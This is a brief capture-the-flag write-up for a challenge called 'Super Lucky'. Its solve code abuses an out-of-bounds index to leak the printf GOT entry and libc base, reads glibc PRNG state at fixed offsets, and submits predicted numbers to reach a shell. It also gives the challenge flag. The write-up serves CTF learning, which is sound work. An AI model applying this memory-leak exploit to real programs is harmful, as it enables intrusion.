Skip to main content

Super Lucky

Challenge

Predict PRNG state via memory disclosures and feed expected numbers to reach shell path.

Solution

Key solve code:

lucky_numbers = elf.sym["lucky_numbers"]
printf_got = elf.got["printf"]

def get(addr):
	i = (addr - lucky_numbers) % 2 ** 64 // 4
	r.sendline(f"{i}".encode())
	r.recvuntil(b": ")
	return p32(int(r.recvlineS().strip()), signed=True)

leak = u64(get(printf_got) + get(printf_got + 4))
base = leak - libc.sym["printf"]

lefts = [u32(get(base + 0x1ba1d0 + 4 * i)) for i in range(7)]
rights = [u32(get(base + 0x1ba1c4 + 4 * i)) for i in range(3)]

# reconstruct state s[] then submit
for state in s:
	r.sendline(f"{state >> 1}".encode())

Flag

gigem{n0_on3_exp3ct5_the_l4gg3d_f1b0n4cc1}